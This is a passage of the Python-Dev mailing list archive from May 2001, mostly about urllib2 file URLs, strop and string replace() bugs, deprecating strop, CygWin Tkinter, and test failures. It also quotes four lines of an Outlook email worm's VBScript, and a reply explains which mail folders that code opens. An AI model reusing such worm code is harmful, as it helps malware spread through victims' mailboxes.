<930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com> My apologies to all --- yes, my machine was hit by a virus that flooded the known universe with email. Sorry for any grief it has caused anyone, Greg From tim.one@home.com Wed May 9 20:30:41 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 15:30:41 -0400 Subject: [Python-Dev] test_urllib2 fails on Win98SE Message-ID: test_urliib2 takes > 30 seconds, then fails: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ? f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file if not host or \ socket.error: host not found The URL it's passing is file://c:\code\python\dist\src\lib\urllib2.pyc If I change test_urllib2's file_url = "file://%s" % urllib2.__file__ to (adding another slash) file_url = "file:///%s" % urllib2.__file__ then it fails like this instead, but very quickly: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ? f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file return addinfourl(open(url2pathname(file), 'rb'), IOError: [Errno 2] No such file or directory: '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc' Here's what I know about URLs: . Here's what I know about file URLs: . Here's what I know about file URLs on Windows: . If I type the original file://c:\code\python\dist\src\lib\urllib2.pyc into IE's address bar, it actually *executes* urllib2. From mwh@python.net Wed May 9 20:50:34 2001 From: mwh@python.net (Michael Hudson) Date: 09 May 2001 20:50:34 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700" References: Message-ID: "Fred L. Drake" writes: > ! fd = PyObject_AsFileDescriptor(obj); > ! if (fd == -1) { > ! if (PyInt_Check(obj)) { ^^^^^^^^^^^^^^^^ this is a bit pointless. I admit ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? TypeError: tcgetattr, arg 1: can't extract file descriptor from "int" is a bit confusing, but I'm not sure ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? error: (9, 'Bad file descriptor') is any better than: ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? ValueError: file descriptor cannot be a negative integer (-2) which is what you get after applying this patch: Index: Modules/termios.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v retrieving revision 2.26 diff -c -r2.26 termios.c *** Modules/termios.c 2001/05/09 17:53:06 2.26 --- Modules/termios.c 2001/05/09 19:49:52 *************** *** 37,43 **** fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! fd = PyInt_AS_LONG(obj); } else { char* tname; --- 37,43 ---- fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! return 0; } else { char* tname; Cheers, M. From fdrake@acm.org Wed May 9 21:09:09 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Wed, 9 May 2001 16:09:09 -0400 (EDT) Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: References: Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Michael Hudson writes: > this is a bit pointless. You're right! (Hey, it was your patch. ;) I'm checking in a different patch -- essentially, PyObject_AsFileDescriptor() does the right thing, and we don't ever need to second guess it. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh@python.net Wed May 9 21:13:46 2001 From: mwh@python.net (Michael Hudson) Date: 09 May 2001 21:13:46 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > I've attached the patch. Due to a small reorganisation the patch is > a little longer -- symmetry has its price at C level too ;-) I may be being dense, but can you explain what's going on here: ->> u'\u00e3'.encode('latin-1') '\xe3' ->> u'\u00e3'.encode("latin-1").decode("latin-1") Traceback (most recent call last): File "", line 1, in ? UnicodeError: ASCII encoding error: ordinal not in range(128) Can you come up with some other example I can use it tomorrow's python-dev summary? Cheers, M. -- Remember - if all you have is an axe, every problem looks like hours of fun. -- Frossie -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html From mwh@python.net Wed May 9 21:18:47 2001 From: mwh@python.net (Michael Hudson) Date: 09 May 2001 21:18:47 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 References: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > this is a bit pointless. > > You're right! (Hey, it was your patch. ;) So it was! I must have uploaded a slightly stale version of the patch, because I noticed this when cvs update conflicted with what I had in Modules/termios.c... oops. > I'm checking in a different patch -- essentially, > PyObject_AsFileDescriptor() does the right thing, and we don't ever > need to second guess it. I was a bit concerned that the error should contain the function name. On reflection, I agree that the code is so much simpler that it's a win. Cheers, M. -- Java sucks. [...] Java on TV set top boxes will suck so hard it might well inhale people from off their sofa until their heads get wedged in the card slots. --- Jon Rabone, ucam.chat From paulp@ActiveState.com Wed May 9 21:48:38 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Wed, 09 May 2001 13:48:38 -0700 Subject: [Python-Dev] test_urllib2 fails on Win98SE References: Message-ID: <3AF9AD26.AC6DD323@ActiveState.com> Tim Peters wrote: > >... > > Here's what I know about file URLs on Windows: . We constantly run into these problems with Komodo. The long and short is that file URL handling on Windows is totally different than on Unix and platform-specific code is probably appropriate. Here's what I know: IE treats the following equivalently: c:\temp\diff.txt file:c:\temp\diff.txt file:/c:\temp\diff.txt file://c:\temp\diff.txt file:///c:\temp\diff.txt file:///////////////////////////////c:\temp\diff.txt You can also reverse backslashes to slashes and slashes to backslashes if you like. Interestingly, though, UNC paths seem to work okay (no matter how you do the slashes and backslashes): file://americano\home\paulp\foo.html UNC paths seem to only allow two leading slashes/backslashes. Truly this is a new level of "be liberal in what you accept". The algorithm is probably something like: 1. normalize to forward slashes. 2. Remove "file:". 3. What you have left should be of the form: //machine/path or (/*)x:/path Where x is the drive letter. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From fredrik@effbot.org Thu May 10 00:19:40 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Thu, 10 May 2001 01:19:40 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid> tim wrote: > Modified Files: > stropmodule.c > Log Message: > SF bug #422088: [OSF1 alpha] string.replace(). > Platform blew up on "123".replace("123", ""). Michael Hudson pinned the > blame on platform malloc(0) returning NULL. any reason why the #ifdef MALLOC_ZERO_RETURNS_NULL macro (in pyport.h) isn't set / doesn't take care of this? (and is it just me, or does the strop.replace function allocate a buffer, copy the result to that buffer, only to copy it into a string and throw the buffer away? no wonder u"".replace() is 30% faster than "".replace() ;-) Cheers /F From tim@digicool.com Thu May 10 00:39:08 2001 From: tim@digicool.com (Tim Peters) Date: Wed, 9 May 2001 19:39:08 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid> Message-ID: [Fredrik Lundh] > any reason why the > > #ifdef MALLOC_ZERO_RETURNS_NULL > > macro (in pyport.h) isn't set / doesn't take care of this? The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends up being plain malloc. As Michael noted in the bug report, it could have used PyMem_Malloc() instead and avoided the problem. But I chose not to do that, since special-casing a result of 0 was more efficient for reasons other than malloc. However: > (and is it just me, or does the strop.replace function allocate > a buffer, copy the result to that buffer, only to copy it into a > string and throw the buffer away? Yes. And I'm returning something now that musn't be free()'ed when the result length is 0. Will fix. > no wonder u"".replace() is 30% faster than "".replace() ;-) For a given number of characters or bytes ? From tim.one@home.com Thu May 10 00:46:13 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 19:46:13 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Message-ID: Oh, fuck. Somebody remind me why we have both stropmodule.c and stringobject.c? These bugs exist in both. From mike.mellor@tbe.com Thu May 10 01:16:28 2001 From: mike.mellor@tbe.com (mike.mellor@tbe.com) Date: Thu, 10 May 2001 00:16:28 -0000 Subject: [Python-Dev] CygWin and Tkinter Message-ID: <9dcmks+6aqf@eGroups.com> I am playing around with CygWin (which came with Pyhton 2.1 installed). While I can run command line programs, Tkinter is not part of the package. TCL/TK is installed and I have been able to build TK GUI's. How can I get Tkinter added to my Python package? Thanks. Mike From tim.one@home.com Thu May 10 01:47:52 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 20:47:52 -0400 Subject: [Python-Dev] Inconsistent string.replace() behavior Message-ID: test_strop.py contains this line: test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0) string_tests.py has this: test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0) IOW, the test suite insists that strop.replace('one!two!three!', '!', '@', 0) replace all matches but that string.replace('one!two!three!', '!', '@', 0) and 'one!two!three!'.replace('!', '@', 0) replace nothing. I've been thrashing like a madman trying to fix a common bug in both modules (in out-of-synch copies of mymemreplace), and every time I think I fix something "the other" module breaks. The above appears to be why. My opinion: the test_strop.py test is in error, and so was strop_replace() in stropmodule.c. I'm checking in changes accordingly, but won't mind getting yelled at if you disagree. From greg@cosc.canterbury.ac.nz Thu May 10 01:56:12 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 10 May 2001 12:56:12 +1200 (NZST) Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz> Tim Peters : > PyObject *t = (PyObject *)op; > PyString_InternInPlace(&t); If you want to keep it all on one line, you could try PyString_InternInPlace((PyObject **)&op); Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From guido@digicool.com Thu May 10 03:00:36 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:00:36 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400." References: Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> > Oh, fuck. Somebody remind me why we have both stropmodule.c and > stringobject.c? These bugs exist in both. In my mind, strop is obsolete. We keep it around because some losers like to import it directly, but it's basically dead, and except for a few functions, string.py doesn't use it any more. (The exceptions are maketrans, lowercase, uppercase, whitespace.) --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Thu May 10 03:01:20 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:01:20 -0500 Subject: [Python-Dev] CygWin and Tkinter In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT." <9dcmks+6aqf@eGroups.com> References: <9dcmks+6aqf@eGroups.com> Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com> > I am playing around with CygWin (which came with Pyhton 2.1 > installed). While I can run command line programs, Tkinter is not > part of the package. TCL/TK is installed and I have been able to > build TK GUI's. How can I get Tkinter added to my Python package? > Thanks. Beats me. Ask whoever produces the CygWin port. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Thu May 10 02:07:40 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 21:07:40 -0400 Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz> Message-ID: >> PyObject *t = (PyObject *)op; >> PyString_InternInPlace(&t); [Greg Ewing] > If you want to keep it all on one line, you could try > > PyString_InternInPlace((PyObject **)&op); op is declared "register" so it's not strictly legal to apply the address-of operator to it regardless. Besides, Guido pays me by the line . or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly y'rs - tim From gward@python.net Thu May 10 02:08:58 2001 From: gward@python.net (Greg Ward) Date: Wed, 9 May 2001 21:08:58 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500 References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> Message-ID: <20010509210858.A3467@gerg.ca> On 09 May 2001, Guido van Rossum said: > In my mind, strop is obsolete. We keep it around because some losers > like to import it directly, but it's basically dead, and except for a > few functions, string.py doesn't use it any more. (The exceptions are > maketrans, lowercase, uppercase, whitespace.) Perhaps 2.2 should deprecate direct use of strop noisily -- warn when imported, except when imported by string.py. (No idea how you'd implement that, I'm just spouting off.) Then it could go away in 2.3. I don't think there's anything particularly controversial about 'strop' going away after one release with a deprecation warning -- it's not 'string', after all! (Ie. imported by every single scrap of Python code ever written before string methods came along, and by quite a lot since then.) Greg -- Greg Ward - nerd gward@python.net http://starship.python.net/~gward/ I joined scientology at a garage sale!! From guido@digicool.com Thu May 10 03:12:55 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:12:55 -0500 Subject: [Python-Dev] Inconsistent string.replace() behavior In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400." References: Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com> > test_strop.py contains this line: > > test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0) > > string_tests.py has this: > > test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0) > > IOW, the test suite insists that > > strop.replace('one!two!three!', '!', '@', 0) > > replace all matches but that > > string.replace('one!two!three!', '!', '@', 0) > and > 'one!two!three!'.replace('!', '@', 0) > > replace nothing. > > I've been thrashing like a madman trying to fix a common bug in both modules > (in out-of-synch copies of mymemreplace), and every time I think I fix > something "the other" module breaks. The above appears to be why. > > My opinion: the test_strop.py test is in error, and so was strop_replace() > in stropmodule.c. I'm checking in changes accordingly, but won't mind > getting yelled at if you disagree. HMMMMMM! In Python 1.5, a count of zero always replaces all occurrences, both using string and using strop. In 2.0 and later, strop's replace(..., 0) still replaces all, but string's replaces none. The replace() method of strings and unicode objects agrees with string.py. I think this change was made in the sake of ease of documenting the behavior: special-casing the count of zero is unexpected. I very vaguely recall that it was discussed on this list. So this suggests that test_string is correct, and string.replace() (and the methods) shouldn't be "fixed"! But since we're not really supporting strop any more, I think that strop shouldn't be changed either. So we'll have to live with the difference -- sorry! --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Thu May 10 02:13:20 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 21:13:20 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > In my mind, strop is obsolete. We keep it around because some losers > like to import it directly, but it's basically dead, and except for a > few functions, string.py doesn't use it any more. (The exceptions are > maketrans, lowercase, uppercase, whitespace.) So if Fred changes the docs to say it's obsolete, maybe we can actually rip out the buggy and redundant code it contains in about 2 years . cheeredly y'rs - tim From guido@digicool.com Thu May 10 03:25:43 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:25:43 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400." <20010509210858.A3467@gerg.ca> References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> <20010509210858.A3467@gerg.ca> Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com> > Perhaps 2.2 should deprecate direct use of strop noisily -- warn when > imported, except when imported by string.py. (No idea how you'd > implement that, I'm just spouting off.) Then it could go away in 2.3. I have had the necessary mods sitting in my directory for months (it was one of my first tests for using the warnings module), but decided against checking it in because I found there's quite a bit of code that triggered the warnings. Maybe I should check it in into 2.2a0, so developers can get used to it. > I don't think there's anything particularly controversial about 'strop' > going away after one release with a deprecation warning -- it's not > 'string', after all! (Ie. imported by every single scrap of Python code > ever written before string methods came along, and by quite a lot since > then.) Agreed. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Thu May 10 03:27:23 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:27:23 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400." References: Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> > [Guido] > > In my mind, strop is obsolete. We keep it around because some losers > > like to import it directly, but it's basically dead, and except for a > > few functions, string.py doesn't use it any more. (The exceptions are > > maketrans, lowercase, uppercase, whitespace.) > > So if Fred changes the docs to say it's obsolete, maybe we can actually rip > out the buggy and redundant code it contains in about 2 years . Yes, but in the mean time the fact that it's buggy doesn't bother me at all. Let it be as buggy as it always was -- that's one more reason to stop using it! :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Thu May 10 02:33:52 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 21:33:52 -0400 Subject: [Python-Dev] Inconsistent string.replace() behavior In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > HMMMMMM! In Python 1.5, a count of zero always replaces all > occurrences, both using string and using strop. In 2.0 and later, > strop's replace(..., 0) still replaces all, but string's replaces > none. The replace() method of strings and unicode objects agrees with > string.py. > > I think this change was made in the sake of ease of documenting the > behavior: special-casing the count of zero is unexpected. Yes, -1 == infinity is much clearer . > I very vaguely recall that it was discussed on this list. > > So this suggests that test_string is correct, and string.replace() > (and the methods) shouldn't be "fixed"! I didn't change their behavior wrt replace()'s interpretation of count, but to repair an unrelated bug (bogus MemoryError for an empty-string *result*) that happened to appear in both copies of mymemreplace sitting in the code base (one in stringobject.c, another but out-of-synch one in stropmodule.c). That's how stropmodule got sucked into this: to fix the gross null-string result bug common to both. > But since we're not really supporting strop any more, I think that > strop shouldn't be changed either. So we'll have to live with the > difference -- sorry! OK, I've restored the 0 == infinity semantics to strop.replace() and test_strop.py, but have not backed out the null-string result fix, nor the pain to make the mymemreplace clones identical again. From tim.one@home.com Thu May 10 03:00:30 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 22:00:30 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Yes, but in the mean time the fact that it's buggy doesn't bother me > at all. Let it be as buggy as it always was -- that's one more reason > to stop using it! :-) I think that's unsustainable in this specific case: stringobject and stropmodule contained several utility functions with the same names that clearly started life as identical code. Over time they got out of synch, and when they punched me in the face today, I had no idea which was "right" and which "wrong". Turned out they both had the same bug, and the clearest way to fix it in stringobject.c without leaving a more inconsistent x-module mess was to bring the once-common utility routines back into synch. As /F said, though, the mymemreplace() approach is inefficient and "should be" replaced wholesale. If that's done in stringobject.c alone, great, then I won't care about the legacy routines in stropmodule.c either. What I can't abide is having one copy of a function in the codebase work and a clone of it not work -- unless you can keep the undocumented history of both in your mind at all times, you're just as likely to bump into the broken one first when searching the code base, and if you're unlucky never even realize it is "the broken one" (or, if you're lucky, bump into the good one too, and then pee away time trying to understand the differences). i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't- eat-it-by-mistake-ly y'rs - tim From Jason.Tishler@dothill.com Thu May 10 03:06:15 2001 From: Jason.Tishler@dothill.com (Jason Tishler) Date: Wed, 9 May 2001 22:06:15 -0400 Subject: [Python-Dev] CygWin and Tkinter In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500 References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com> Message-ID: <20010509220615.A1928@dothill.com> Mike, On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote: > > I am playing around with CygWin (which came with Pyhton 2.1 > > installed). While I can run command line programs, Tkinter is not > > part of the package. TCL/TK is installed and I have been able to > > build TK GUI's. How can I get Tkinter added to my Python package? > > Thanks. > > Beats me. Ask whoever produces the CygWin port. I am the Cygwin Python maintainer. Please see the following for my views on adding Tkinter support to Cygwin Python: http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html If Tkinter support is important to you, then please submit the appropriate patches for consideration to the Python Patch Manager on SourceForge. Norman Vine has built a Cygwin Python that supports Tkinter. See the following for his build procedure: http://www.vso.cape.com/~nhv/files/python/ Perhaps you would like to collaborate with Norman on this effort? Thanks, Jason -- Jason Tishler Director, Software Engineering Phone: +1 (732) 264-8770 x235 Dot Hill Systems Corp. Fax: +1 (732) 264-8798 82 Bethany Road, Suite 7 Email: Jason.Tishler@dothill.com Hazlet, NJ 07730 USA WWW: http://www.dothill.com From tim.one@home.com Thu May 10 03:54:45 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 9 May 2001 22:54:45 -0400 Subject: [Python-Dev] test_mmap failing? Message-ID: I checked in a change to mmapmodule.c earlier today, to close a patch complaining about unused vrbl warnings. Here's the changed routine before ("value" is unused): mmap_read_byte_method(mmap_object *self, PyObject *args) { char value; char *where; CHECK_VALID(NULL); if (!PyArg_ParseTuple(args, ":read_byte")) return NULL; if (self->pos < self->size) { where = self->data + self->pos; value = (char) *(where); self->pos += 1; return Py_BuildValue("c", (char) *(where)); } else { PyErr_SetString (PyExc_ValueError, "read byte out of range"); return NULL; } } and after: mmap_read_byte_method(mmap_object *self, PyObject *args) { CHECK_VALID(NULL); if (!PyArg_ParseTuple(args, ":read_byte")) return NULL; if (self->pos < self->size) { char value = self->data[self->pos]; self->pos += 1; return Py_BuildValue("c", value); } else { PyErr_SetString (PyExc_ValueError, "read byte out of range"); return NULL; } } I'll be damned if I can see any semantic difference, and test_mmap worked fine on Windows after the change. But Fred reported: """ the fix introduced breakage on Linux (kernel 2.2.17): cj42289-a(.../python/linux-beowolf); ./python ../Lib/test/regrtest.py -v test_mmap test_mmap test_mmap test test_mmap crashed -- exceptions.IOError: [Errno 22] Invalid argument Traceback (most recent call last): File "../Lib/test/regrtest.py", line 246, in runtest __import__(test, globals(), locals(), []) File "../Lib/test/test_mmap.py", line 124, in ? test_both() File "../Lib/test/test_mmap.py", line 14, in test_both f.write('\0'* PAGESIZE) IOError: [Errno 22] Invalid argument 1 test failed: test_mmap """ However, at the point that's failing, test_mmap hasn't even *created* an mmap'ed file yet, let alone tried to read from it. The only thing test_mmap did so far is (the first comment is bogus -- that's the builtin Python open() function): # Create an mmap'ed file # THIS IS A BOGUS COMMENT f = open('foo', 'w+') # Write 2 pages worth of data to the file f.write('\0'* PAGESIZE) # THIS IS THE LINE IT'S DYING ON But having suffered too many "impossible problems" the last 36 hours, my confidence is shot <0.93 wink>. Is test_mmap failing for anyone else under current CVS? Fred, are you *sure* it fails for you -- if so, does the problem actually go away if you revert mmapmodule.c? looking-for-sense-in-all-the-wrong-places-ly y'rs - tim From jeremy@digicool.com Thu May 10 04:17:34 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Wed, 9 May 2001 23:17:34 -0400 (EDT) Subject: [Python-Dev] test_mmap failing? In-Reply-To: References: Message-ID: <15098.2126.368714.159135@slothrop.digicool.com> The latest CVS build works on my Linux 2.2.12 system. No problem with test_mmap. But test_pty does fail with some complaints about FCNTL, which Fred just removed. Maybe Fred is working in an alternate universe where test_mmap and test_pty are swapped. Jeremy From barry@digicool.com Thu May 10 05:08:42 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Thu, 10 May 2001 00:08:42 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <15098.5194.677531.35326@anthem.wooz.org> >>>>> "TP" == Tim Peters writes: TP> Oh, fuck. Somebody remind me why we have both stropmodule.c TP> and stringobject.c? These bugs exist in both. IIRC, I once proposed to share code bases through elaborate #includes and exported functions, but that never went very far. Guido's already pronounced on this, and I'd say good riddance to strop. >>>>> "GvR" == Guido van Rossum writes: GvR> Yes, but in the mean time the fact that it's buggy doesn't GvR> bother me at all. Let it be as buggy as it always was -- GvR> that's one more reason to stop using it! :-) -----------------------------------^^^^ For a minute there, I thought you said "to strop using it". :) -Barry From fredrik@pythonware.com Thu May 10 07:22:53 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Thu, 10 May 2001 08:22:53 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid> Tim Peters wrote: > I think that's unsustainable in this specific case: stringobject and > stropmodule contained several utility functions with the same names that > clearly started life as identical code. Over time they got out of synch, and > when they punched me in the face today, I had no idea which was "right" and > which "wrong". Turned out they both had the same bug, and the clearest way > to fix it in stringobject.c without leaving a more inconsistent x-module mess > was to bring the once-common utility routines back into synch. > > As /F said, though, the mymemreplace() approach is inefficient and "should > be" replaced wholesale. If that's done in stringobject.c alone, great, then > I won't care about the legacy routines in stropmodule.c either. as a footnote, SRE uses the same source code to generate both 8-bit and 16-bit versions of the match engine. I see no reason why we cannot do the same for the string operations (PyString, PyUnicode, and strop). if anyone wants me to look into this, just say "go ahead". > > no wonder u"".replace() is 30% faster than "".replace() ;-) > > For a given number of characters or bytes ? characters. judging from the SRE benchmarks, modern platforms can process 16-bit characters as fast as they can process 8-bit characters. Cheers /F From thomas@xs4all.net Thu May 10 10:31:38 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Thu, 10 May 2001 11:31:38 +0200 Subject: [Python-Dev] Homepage In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200 References: <200105091712.TAA05172@core.inf.ethz.ch> Message-ID: <20010510113138.K16486@xs4all.nl> On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote: > Set s=CreateObject("Outlook.Application") > Set t=s.GetNameSpace("MAPI") > Set u=t.GetDefaultFolder(6) [..] > Set u=t.GetDefaultFolder(3) I know it's off-topic, but Greg started it! ;-) Does anyone know which folders those two 'GetDefaultFolder' statements open ? I suspect it's sent-mail and trash, or some such, but I don't know enough about Outlook to know if it even *has* sent-mail and trash folders :) Thanx for sending it through, Samuele, it was fun reading, and useful to our helpdesk (especially the fact that it only sends out mails once, even though it starts the porn page every time, and that it doesn't do anything harmful at all.) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From MarkH@ActiveState.com Thu May 10 11:36:13 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Thu, 10 May 2001 20:36:13 +1000 Subject: [Python-Dev] Homepage In-Reply-To: <20010510113138.K16486@xs4all.nl> Message-ID: > > Set u=t.GetDefaultFolder(6) > > Set u=t.GetDefaultFolder(3) > I know it's off-topic, but Greg started it! ;-) Does anyone know which > folders those two 'GetDefaultFolder' statements open ? I suspect it's > sent-mail and trash, or some such, but I don't know enough about > Outlook to > know if it even *has* sent-mail and trash folders :) Running makepy.py over the Outlook type library yields the following: olFolderCalendar =0x9 # from enum OlDefaultFolders olFolderContacts =0xa # from enum OlDefaultFolders olFolderDeletedItems =0x3 # from enum OlDefaultFolders olFolderDrafts =0x10 # from enum OlDefaultFolders olFolderInbox =0x6 # from enum OlDefaultFolders olFolderJournal =0xb # from enum OlDefaultFolders olFolderNotes =0xc # from enum OlDefaultFolders olFolderOutbox =0x4 # from enum OlDefaultFolders olFolderSentMail =0x5 # from enum OlDefaultFolders olFolderTasks =0xd # from enum OlDefaultFolders So it appears the inbox and deleted items. Mark. From tim.one@home.com Thu May 10 09:54:42 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 10 May 2001 04:54:42 -0400 Subject: [Python-Dev] test___all__ failing on WIndows Message-ID: > python ../lib/test/regrtest.py test___all__ test___all__ test test___all__ failed -- tty has no __all__ attribute 1 test failed: test___all__ C:\Code\python\dist\src\PCbuild> I assume this is yet another case where some excruciatingly non-obvious sequence of failing imports manages to leave behind a damaged module object in sys.modules that prevents test___all__'s import of tty from getting the 